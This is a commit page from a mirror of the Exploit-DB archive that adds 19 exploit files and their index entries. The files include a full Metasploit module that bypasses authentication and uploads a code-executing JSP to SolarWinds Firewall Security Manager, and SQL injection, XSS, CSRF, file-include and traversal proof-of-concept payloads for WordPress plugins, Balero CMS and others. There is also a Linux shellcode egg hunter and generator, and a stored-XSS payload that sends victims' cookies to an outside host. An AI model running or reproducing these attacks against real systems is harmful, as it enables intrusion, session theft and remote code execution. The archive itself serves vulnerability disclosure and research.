bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-04-09

Browse source 
19 new exploits
This commit is contained in:
Offensive Security 2015-04-09 08:36:09 +00:00
parent 9a45389171
commit 0607d0429f
20 changed files with 812 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -33069,3 +33069,22 @@ id,file,description,date,author,platform,type,port
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 'weblink_id' Parameter SQL Injection Vulnerability",2012-02-03,Am!r,php,webapps,0
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow Vulnerability",2012-02-06,"Senator of Pirates",windows,dos,0
36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2012-02-06,"Tomas Hoger",linux,remote,0
36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 'getid3.php' Local File Include Vulnerability",2012-02-06,T0x!c,php,webapps,0
36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 'export' Parameter Cross Site Scripting Vulnerability",2012-02-07,"Infoserve Security Team",php,webapps,0
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80
36672,platforms/lin_x86/shellcode/36672.asm,"Shellcode: Linux x86 Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36673,platforms/lin_x86/shellcode/36673.py,"Shellcode: Linux x86 Typewriter Shellcode Generator",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 Persistent XSS",2015-04-08,"Kacper Szurek",php,webapps,80
36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 Multiple Blind SQL Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80
36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80
36677,platforms/php/webapps/36677.txt,"Wordpress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80
36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0
36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 Client Session Handling",2015-04-08,metasploit,windows,remote,0
36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products Remote Security Bypass Vulnerability",2012-02-10,console-cowboys,hardware,remote,0
36681,platforms/multiple/remote/36681.txt,"Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability",2012-02-09,"Paul Nicolucci",multiple,remote,0
36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service Vulnerability",2011-09-24,anonymous,php,dos,0
36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x 'adherents/fiche.php' SQL Injection Vulnerability",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0

Can't render this file because it is too large.

14
platforms/hardware/remote/36670.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/51918/info
D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
The following products are affected:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml

7
platforms/hardware/remote/36680.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51922/info
Multiple Trendnet Camera products are prone to a remote security-bypass vulnerability.
Successfully exploiting this issue will allow remote attackers to gain access to a live stream from the camera.
http://www.example.com/anony/mjpg.cgi

9
platforms/java/webapps/36666.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51893/info
ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected.
#2 - POST http://www.example.com/DomainConfig.do?methodToCall=save HTTP/1.1 - DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert(&#039;zsl&#039;)</script>&reset=

9
platforms/java/webapps/36667.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51893/info
ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected.
#1 - GET http://www.example.com/jsp/AddDC.jsp?domainName="><script>alert(&#039;zsl&#039;)</script> HTTP/1.1

69
platforms/jsp/webapps/36678.txt Executable file
View file

@ -0,0 +1,69 @@
>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 07/04/2015 / Last updated: 07/04/2015
>> Background on the affected product:
"Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a
single machine to Windows 7. Novell ZENworks Configuration Management
is ready to dramatically accelerate and automate every aspect of your
Windows 7 migration efforts.
Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always
have access to the resources they need regardless of where they work
or what devices they use.
Eliminate IT effort
Automatically enforce policies and dynamically manage resources with
identity-based management of users as well as devices.
Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full
support for Windows and Linux systems, Novell eDirectory, Active
Directory, and more.
Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.
Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified
and easy-to-use web-based ZENworks console—called ZENworks Control
Center."
This vulnerability is present in ZENworks Configuration Management
(ZCM) which is part of the ZENworks Suite.
A blast from the past? This is a similar vulnerability to ZDI-10-078 /
OSVDB-63412, but it abuses a different parameter of the same servlet.
However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you
can download it now from their site, install and test the PoC /
Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information
(https://www.novell.com/support/kb/doc.php?id=7015776).
>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below
POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
<WAR file payload in the body>
The WAR file will be automatically deployed to the server (on certain
Windows and Linux installations the path can be "../webapps/"). A
Metasploit module that exploits this vulnerability has been released.
>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.
[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096

23
platforms/lin_x86/shellcode/36672.asm Executable file
View file

@ -0,0 +1,23 @@
; Egg Hunter (20 bytes)
; - searches from current addr towards lower memory
; - marker: 0x5159 (push ecx,pop ecx)
; Paw Petersen, SLAE-656
; https://www.pawpetersen.dk/slae-assignment-3-egg-hunter-linux-x86/
global _start
section .text
_start:
jmp call_egghunter
egghunter:
pop ecx ; save addr ptr
sub ecx, 23 ; move addr ptr back
next:
cmp word [ecx], 0x5951 ; marker
loopnz next ; dec ecx, jump
jmp ecx ; jump to shellcode
call_egghunter:
call egghunter
; "\xeb\x0d\x59\x83\xe9\x17\x66\x81\x39\x51\x59\xe0"
; ”\xf9\xff\xe1\xe8\xee\xff\xff\xff"

27
platforms/lin_x86/shellcode/36673.py Executable file
View file

@ -0,0 +1,27 @@
#!/usr/bin/env python
# Typewriter Shellcode Generator
# Paw Petersen, SLAE-656
# https://www.pawpetersen.dk/typewriter-shellcode-generator-linux-x86/
import sys,struct
string = sys.argv[1]
length = struct.pack("<b",len(string)+1)
asm_string_chunk = ""
for chunk_start in range(0,len(string),4):
chunk = string[chunk_start:chunk_start+4]
if chunk_start+4 >= len(string):
if len(chunk) < 4:
asm_string_chunk = ("\x68"+struct.pack("<4s",chunk+"\x0a"*(4-len(chunk))))+asm_string_chunk
else:
asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk
asm_string_chunk = ("\x68"+struct.pack("<4s","\x0a"*4))+asm_string_chunk
else:
asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk
sc = asm_string_chunk+"\x31\xc9\xb1"+length+"\x51\xb8\x11\x11\x51\x08\x50\x31\xc0\x50\x54\x51\x89\xe6\x83\xc6\x14\x03\x74\x24\x10\x2b\x34\x24\x56\x89\xf1\xeb\x1c\xeb\x0c\x59\x59\xe2\xe8\x31\xdb\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\xa2\x8d\x5c\x24\x0c\x31\xc9\xcd\x80\xeb\xe6\x31\xd2\xb2\x01\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xeb\xd4"
print '"' + ''.join('\\x%02x' % ord(c) for c in sc) + '";'

13
platforms/multiple/remote/36681.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/51939/info
Apache MyFaces is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
The following versions are affected:
Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5
http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF

18
platforms/php/dos/36682.php Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/51952/info
PHP is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.
PHP 5.3.8 is vulnerable; other versions may also be affected.
<?php
// make a Pdo_Mysql statement before
$result = $stmt->fetch(PDO::FETCH_LAZY);
session_start();
$_SESSION['PDORow'] = $result;
?>

9
platforms/php/webapps/36664.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51878/info
Vespa is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Vespa 0.8.6 is vulnerable; other versions may also be affected.
http://www.example.com/[ Path ]/getid3/getid3.php?include=[LFI]%00

9
platforms/php/webapps/36665.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51882/info
Simple Groupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Simple Groupware 0.742 is vulnerable; other versions may also be affected.
http://www.example.com/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert(&#039;xss&#039;)</ScRiPt>

10
platforms/php/webapps/36668.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/51894/info
eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
eFront 3.6.10 is vulnerable; other versions may also be affected.
http://www.example.com/communityplusplus/www/administrator.php?ctg=languages&ajax=languagesTable&
limit=200&offset=0&sort=active&order=asc&other=&filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C

90
platforms/php/webapps/36671.txt Executable file
View file

@ -0,0 +1,90 @@
######################
# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U
# Date : 2015-04-05
# Tested on : Linux / Mozilla Firefox
######################
# Description
WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability
There are some pages with wordpress esc_sql function.
esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)
isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';
- admin/wp-security-list-404.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
$order = !empty($order) ? esc_sql($order) : 'DESC';
...
...
$data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);
- admin/wp-security-list-login-fails.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);
- admin/wp-security-list-acct-activity-php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A)
- admin/wp-security-list-locked-ip.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A)
######################
# PoC
http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc
######################
# Vulnerability Disclosure Timeline:
2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################

67
platforms/php/webapps/36674.txt Executable file
View file

@ -0,0 +1,67 @@
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
1. Description
ShareaholicAdmin::add_location is accessible for every registered user.
File: shareaholic\shareaholic.php
add_action('wp_ajax_shareaholic_add_location', array('ShareaholicAdmin', 'add_location'));
$_POST['location'] is not escaped.
File: shareaholic\admin.php
public static function add_location() {
$location = $_POST['location'];
$app_name = $location['app_name'];
ShareaholicUtilities::update_options(array(
'location_name_ids' => array(
$app_name => array(
$location['name'] => $location['id']
),
),
$app_name => array(
$location['name'] => 'on'
)
));
echo json_encode(array(
'status' => "successfully created a new {$location['app_name']} location",
'id' => $location['id']
));
die();
}
http://security.szurek.pl/shareaholic-7603-xss.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="shareaholic_add_location">
<input type="hidden" name="location[app_name]" value="recommendations">
<input type="hidden" name="location[name]" value="post_below_content">
XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">
<input type="submit" value="Hack!">
</form>
XSS will be visible for admin:
http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings
3. Solution:
Update to version 7.6.1.0
https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/

62
platforms/php/webapps/36675.txt Executable file
View file

@ -0,0 +1,62 @@
?
Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities
Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2
Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.
Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters thru their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages [admin]
- themes [admin]
- code [mod-languages]
- id [mod-blog, mod-virtual_page]
- title [mod-blog]
- a [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php
04.03.2015
--
csrf+bsqli poc:
<html>
<body>
<form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
<input type="hidden" name="virtual_title" value="ZSL" />
<input type="hidden" name="a" value="1" />
<input type="hidden" name="content" value="Testingus" />
<input type="hidden" name="_wysihtml5_mode" value="1" />
<input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
<input type="hidden" name="submit_delete" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

60
platforms/php/webapps/36676.html Executable file
View file

@ -0,0 +1,60 @@
?<!--
Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities
Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2
Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.
Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php
04.03.2015
-->
<html>
<body>
<script>
document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
</script>
</body>
</html>
csrf+stored xss+filter bypass+session hijack:
<html>
<body>
<form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
<input type="hidden" name="title" value="ZSL" />
<input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
<input type="hidden" name="files" value="joxy.poxy" />
<input type="hidden" name="delete_post[]" value="135" />
<input type="hidden" name="id" value="135" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

47
platforms/php/webapps/36677.txt Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11
[+] Issue [+]
The Wordpress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection vulnerability. The application does not properly validate input from the "Referer" HTTP header value.
[+] Impact [+]
This vulnerability would allow a remote attacker to access the database with the privleges configured by Wordpress. This could also lead to the attack gaining remote access to the webservers filesystem and further compromise the system hosting the Wordpress installation.
[+] Details [+]
The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended on being used to insert data into the database. The the variable $referer is not checked for malicious data.
From 'class-TrafficAnalyzer.php' line number 297:
######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
" ('".$hid."'," .
" '".$_SERVER["REMOTE_ADDR"]."', ".
"'".$_SERVER['SCRIPT_NAME']."', " .
" '".$_SERVER["HTTP_USER_AGENT"]."', ".
" '". $_SERVER['REQUEST_URI']. "', ".
" '".$resource_type."', " .
" '".$browser."', " .
" '".$resource ."', " .
" '".$referer . "', " .
" '".$this->wpta_cookie . "'" .
" )";
###########################################################################################
[+] Proof of Concept [+]
Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.
GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'

9
platforms/php/webapps/36683.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51956/info
Dolibarr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected.
http://www.example.com/adherents/fiche.php?rowid=-1%27

241
platforms/windows/remote/36679.rb Executable file
View file

@ -0,0 +1,241 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
'Description' => %q{
This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
the 'username' attribute before authentication. The second problem is that the settings-new.jsp
file will only check the 'username' attribute before authorizing the 'uploadFile' action,
which can be exploited and allows the attacker to upload a fake xls host list file to the
server, and results in arbitrary code execution under the context of SYSTEM.
Depending on the installation, by default the Change Advisor web server is listening on port
48080 for an express install. Otherwise, this service may appear on port 8080.
Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
download it from the module's References section.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', # Original discovery
'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
'sinn3r' # Metasploit
],
'References' =>
[
['CVE', '2015-2284'],
['OSVDB', '81634'],
['ZDI', '15-107'],
['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
],
'DefaultOptions' =>
{
'RPORT' => 48080 # Could be 8080 too
},
'Platform' => 'win',
'Targets' =>
[
['Solarwinds Firewall Security Manager 6.6.5', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 13 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
], self.class)
end
# Returns a checkcode that indicates whether the target is FSM or not
def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))
if res && res.body =~ /SolarWinds FSM Change Advisor/i
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
# Exploit/run command
def exploit
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
end
# Stage 1 of the attack
# 'admin' is there by default and you can't delete it
username = 'admin'
print_status("Auth bypass: Putting session value: username=#{username}")
sid = put_session_value(username)
print_status("Your SID is: #{sid}")
# Stage 2 of the attack
exe = generate_payload_exe(code: payload.encoded)
filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
# Because when we get a shell, we will be at:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
# So we have to adjust this filename in order to delete the file
register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}")
malicious_file = get_jsp_payload(exe, filename)
print_status("Uploading file: #{filename} (#{exe.length} bytes)")
upload_exec(sid, filename, malicious_file)
end
private
# Returns a write-stager
# I grabbed this from Juan's sonicwall_gms_uploaded.rb module
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
# Returns JSP that executes stuff
# This is also from Juan's sonicwall_gms_uploaded.rb module
def jsp_execute_command(command)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|try {\n|
jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
jspraw << %Q|} catch (IOException ioe) { }\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
# Returns a JSP payload
def get_jsp_payload(exe, output_file)
jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
end
# Creates an arbitrary username by abusing the server's unsafe use of session.putValue
def put_session_value(value)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
'method' => 'GET',
'vars_get' => { 'username' => value }
)
unless res
fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
end
get_sid(res)
end
# Returns the session ID
def get_sid(res)
cookies = res.get_cookies
sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
sid
end
# Uploads a malicious file and then execute it
def upload_exec(sid, filename, malicious_file)
res = upload_file(sid, filename, malicious_file)
if !res
fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
elsif res.body.include?('java.lang.NoClassDefFoundError')
print_status('Payload being treated as XLS, indicates a successful upload.')
else
print_status('Unsure of a successful upload.')
end
print_status('Attempting to execute the payload.')
exec_file(sid, filename)
end
# Uploads a malicious file
# By default, the file will be saved at the following location:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
def upload_file(sid, filename, malicious_file)
# Put our payload in:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
filename = "../../jsp/#{filename}"
mime_data = Rex::MIME::Message.new
mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
mime_data.add_part('uploadFile', nil, nil, 'name="action"')
proto = ssl ? 'https' : 'http'
ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
'method' => 'POST',
'vars_get' => { 'action' => 'uploadFile' },
'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",
'data' => mime_data.to_s,
'cookie' => sid,
'headers' => { 'Referer' => ref }
)
end
# Executes the malicious file and get code execution
# We will be at this location:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
def exec_file(sid, filename)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', filename)
)
end
# Overrides the original print_status so we make sure we print the rhost and port
def print_status(msg)
super("#{rhost}:#{rport} - #{msg}")
end
end